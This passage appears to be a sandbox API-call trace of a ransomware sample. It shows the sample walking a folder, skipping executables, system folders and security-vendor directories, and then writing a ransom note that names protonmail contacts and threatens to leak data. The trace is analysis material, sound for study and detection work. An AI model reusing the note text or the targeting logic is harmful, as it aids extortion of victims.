returned 1 [0160.494] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.494] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4318, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeRUM.htm", cAlternateFileName="README~4.HTM")) returned 1 [0160.494] lstrcmpW (lpString1="ReadMeRUM.htm", lpString2=".") returned 1 [0160.494] lstrcmpW (lpString1="ReadMeRUM.htm", lpString2="..") returned 1 [0160.494] StrStrIW (lpFirst="ReadMeRUM.htm", lpSrch=".UAKXC") returned 0x0 [0160.494] StrStrIW (lpFirst="ReadMeRUM.htm", lpSrch=".exe") returned 0x0 [0160.494] StrStrIW (lpFirst="ReadMeRUM.htm", lpSrch=".dll") returned 0x0 [0160.494] StrStrIW (lpFirst="ReadMeRUM.htm", lpSrch=".lnk") returned 0x0 [0160.494] StrStrIW (lpFirst="ReadMeRUM.htm", lpSrch=".sys") returned 0x0 [0160.494] StrStrIW (lpFirst="ReadMeRUM.htm", lpSrch=".msi") returned 0x0 [0160.494] StrStrIW (lpFirst="ReadMeRUM.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.494] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77951d8 [0160.494] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.494] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.494] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.494] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.494] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.494] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77951d8 | out: hHeap=0xea0000) returned 1 [0160.494] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.494] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77951d8 [0160.494] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796250 [0160.494] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.494] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.494] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4872, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeRUS.htm", cAlternateFileName="README~3.HTM")) returned 1 [0160.495] lstrcmpW (lpString1="ReadMeRUS.htm", lpString2=".") returned 1 [0160.495] lstrcmpW (lpString1="ReadMeRUS.htm", lpString2="..") returned 1 [0160.495] StrStrIW (lpFirst="ReadMeRUS.htm", lpSrch=".UAKXC") returned 0x0 [0160.495] StrStrIW (lpFirst="ReadMeRUS.htm", lpSrch=".exe") returned 0x0 [0160.495] StrStrIW (lpFirst="ReadMeRUS.htm", lpSrch=".dll") returned 0x0 [0160.495] StrStrIW (lpFirst="ReadMeRUS.htm", lpSrch=".lnk") returned 0x0 [0160.495] StrStrIW (lpFirst="ReadMeRUS.htm", lpSrch=".sys") returned 0x0 [0160.495] StrStrIW (lpFirst="ReadMeRUS.htm", lpSrch=".msi") returned 0x0 [0160.495] StrStrIW (lpFirst="ReadMeRUS.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.495] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795200 [0160.495] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.495] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.495] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.495] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.495] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.495] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795200 | out: hHeap=0xea0000) returned 1 [0160.495] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.495] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795200 [0160.495] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77962c8 [0160.495] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.495] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.495] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeSKY.htm", cAlternateFileName="README~2.HTM")) returned 1 [0160.495] lstrcmpW (lpString1="ReadMeSKY.htm", lpString2=".") returned 1 [0160.495] lstrcmpW (lpString1="ReadMeSKY.htm", lpString2="..") returned 1 [0160.495] StrStrIW (lpFirst="ReadMeSKY.htm", lpSrch=".UAKXC") returned 0x0 [0160.495] StrStrIW (lpFirst="ReadMeSKY.htm", lpSrch=".exe") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeSKY.htm", lpSrch=".dll") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeSKY.htm", lpSrch=".lnk") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeSKY.htm", lpSrch=".sys") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeSKY.htm", lpSrch=".msi") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeSKY.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.496] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795228 [0160.496] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.496] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.496] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.496] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.496] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.496] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795228 | out: hHeap=0xea0000) returned 1 [0160.496] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.496] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795228 [0160.496] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796340 [0160.496] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.496] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.496] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4995, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReadMeUKR.htm", cAlternateFileName="README~1.HTM")) returned 1 [0160.496] lstrcmpW (lpString1="ReadMeUKR.htm", lpString2=".") returned 1 [0160.496] lstrcmpW (lpString1="ReadMeUKR.htm", lpString2="..") returned 1 [0160.496] StrStrIW (lpFirst="ReadMeUKR.htm", lpSrch=".UAKXC") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeUKR.htm", lpSrch=".exe") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeUKR.htm", lpSrch=".dll") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeUKR.htm", lpSrch=".lnk") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeUKR.htm", lpSrch=".sys") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeUKR.htm", lpSrch=".msi") returned 0x0 [0160.496] StrStrIW (lpFirst="ReadMeUKR.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795250 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.497] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.497] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.497] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795250 | out: hHeap=0xea0000) returned 1 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795250 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77963b8 [0160.497] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7794778 | out: hHeap=0xea0000) returned 1 [0160.497] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.497] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x833608a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0160.497] lstrcmpW (lpString1="Resource", lpString2=".") returned 1 [0160.497] lstrcmpW (lpString1="Resource", lpString2="..") returned 1 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="tmp") returned 0x0 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="winnt") returned 0x0 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="temp") returned 0x0 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="thumb") returned 0x0 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="$Recycle.Bin") returned 0x0 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="System Volume Information") returned 0x0 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="Boot") returned 0x0 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="Windows") returned 0x0 [0160.497] StrStrIW (lpFirst="Resource", lpSrch="Trend Micro") returned 0x0 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795278 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.497] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.498] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.498] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.498] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.498] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795278 | out: hHeap=0xea0000) returned 1 [0160.498] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795278 [0160.498] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7794778 [0160.498] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.498] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf66ca0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf66ca0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup Files", cAlternateFileName="SETUPF~1")) returned 1 [0160.498] lstrcmpW (lpString1="Setup Files", lpString2=".") returned 1 [0160.498] lstrcmpW (lpString1="Setup Files", lpString2="..") returned 1 [0160.498] StrStrIW (lpFirst="Setup Files", lpSrch="tmp") returned 0x0 [0160.498] StrStrIW (lpFirst="Setup Files", lpSrch="winnt") returned 0x0 [0160.498] StrStrIW (lpFirst="Setup Files", lpSrch="temp") returned 0x0 [0160.498] StrStrIW (lpFirst="Setup Files", lpSrch="thumb") returned 0x0 [0160.498] StrStrIW (lpFirst="Setup Files", lpSrch="$Recycle.Bin") returned 0x0 [0160.498] StrStrIW (lpFirst="Setup Files", lpSrch="$RECYCLE.BIN") returned 0x0 [0160.498] StrStrIW (lpFirst="Setup Files", lpSrch="System Volume Information") returned 0x0 [0160.498] StrStrIW (lpFirst="Setup Files", lpSrch="Boot") returned 0x0 [0160.499] StrStrIW (lpFirst="Setup Files", lpSrch="Windows") returned 0x0 [0160.499] StrStrIW (lpFirst="Setup Files", lpSrch="Trend Micro") returned 0x0 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77952a0 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.499] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.499] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.499] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77952a0 | out: hHeap=0xea0000) returned 1 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77952a0 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796430 [0160.499] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.499] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vigtigt.htm", cAlternateFileName="")) returned 1 [0160.499] lstrcmpW (lpString1="Vigtigt.htm", lpString2=".") returned 1 [0160.499] lstrcmpW (lpString1="Vigtigt.htm", lpString2="..") returned 1 [0160.499] StrStrIW (lpFirst="Vigtigt.htm", lpSrch=".UAKXC") returned 0x0 [0160.499] StrStrIW (lpFirst="Vigtigt.htm", lpSrch=".exe") returned 0x0 [0160.499] StrStrIW (lpFirst="Vigtigt.htm", lpSrch=".dll") returned 0x0 [0160.499] StrStrIW (lpFirst="Vigtigt.htm", lpSrch=".lnk") returned 0x0 [0160.499] StrStrIW (lpFirst="Vigtigt.htm", lpSrch=".sys") returned 0x0 [0160.499] StrStrIW (lpFirst="Vigtigt.htm", lpSrch=".msi") returned 0x0 [0160.499] StrStrIW (lpFirst="Vigtigt.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77952c8 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.499] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.499] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.499] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.499] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77952c8 | out: hHeap=0xea0000) returned 1 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77964a8 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77952c8 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796520 [0160.500] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77964a8 | out: hHeap=0xea0000) returned 1 [0160.500] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.500] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Viktig.htm", cAlternateFileName="")) returned 1 [0160.500] lstrcmpW (lpString1="Viktig.htm", lpString2=".") returned 1 [0160.500] lstrcmpW (lpString1="Viktig.htm", lpString2="..") returned 1 [0160.500] StrStrIW (lpFirst="Viktig.htm", lpSrch=".UAKXC") returned 0x0 [0160.500] StrStrIW (lpFirst="Viktig.htm", lpSrch=".exe") returned 0x0 [0160.500] StrStrIW (lpFirst="Viktig.htm", lpSrch=".dll") returned 0x0 [0160.500] StrStrIW (lpFirst="Viktig.htm", lpSrch=".lnk") returned 0x0 [0160.500] StrStrIW (lpFirst="Viktig.htm", lpSrch=".sys") returned 0x0 [0160.500] StrStrIW (lpFirst="Viktig.htm", lpSrch=".msi") returned 0x0 [0160.500] StrStrIW (lpFirst="Viktig.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77952f0 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.500] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.500] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.500] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77952f0 | out: hHeap=0xea0000) returned 1 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77964a8 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77952f0 [0160.500] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796598 [0160.500] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77964a8 | out: hHeap=0xea0000) returned 1 [0160.501] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.501] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 1 [0160.501] lstrcmpW (lpString1="Viktigt.htm", lpString2=".") returned 1 [0160.501] lstrcmpW (lpString1="Viktigt.htm", lpString2="..") returned 1 [0160.501] StrStrIW (lpFirst="Viktigt.htm", lpSrch=".UAKXC") returned 0x0 [0160.501] StrStrIW (lpFirst="Viktigt.htm", lpSrch=".exe") returned 0x0 [0160.501] StrStrIW (lpFirst="Viktigt.htm", lpSrch=".dll") returned 0x0 [0160.501] StrStrIW (lpFirst="Viktigt.htm", lpSrch=".lnk") returned 0x0 [0160.501] StrStrIW (lpFirst="Viktigt.htm", lpSrch=".sys") returned 0x0 [0160.501] StrStrIW (lpFirst="Viktigt.htm", lpSrch=".msi") returned 0x0 [0160.501] StrStrIW (lpFirst="Viktigt.htm", lpSrch="R3ADM3.txt") returned 0x0 [0160.501] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795318 [0160.501] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.501] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.501] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.501] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.501] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.501] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7795318 | out: hHeap=0xea0000) returned 1 [0160.501] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x77964a8 [0160.501] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7795318 [0160.501] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0x7796610 [0160.501] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77964a8 | out: hHeap=0xea0000) returned 1 [0160.501] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf350d8 | out: hHeap=0xea0000) returned 1 [0160.501] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 0 [0160.502] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebee0 | out: hHeap=0xea0000) returned 1 [0160.502] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6830 | out: hHeap=0xea0000) returned 1 [0160.502] FindClose (in: hFindFile=0xecfb60 | out: hFindFile=0xecfb60) returned 1 [0160.502] Sleep (dwMilliseconds=0x32) [0160.571] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0160.571] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0160.571] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0160.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0160.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebee0 [0160.572] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebda8 | out: hHeap=0xea0000) returned 1 [0160.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebda8 [0160.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6830 [0160.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebcd8 [0160.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeebc70 [0160.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf350d8 [0160.572] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebc70 | out: hHeap=0xea0000) returned 1 [0160.572] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebcd8 | out: hHeap=0xea0000) returned 1 [0160.572] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6830 | out: hHeap=0xea0000) returned 1 [0160.572] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6dc [0160.573] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0160.573] WriteFile (in: hFile=0x6dc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0160.574] 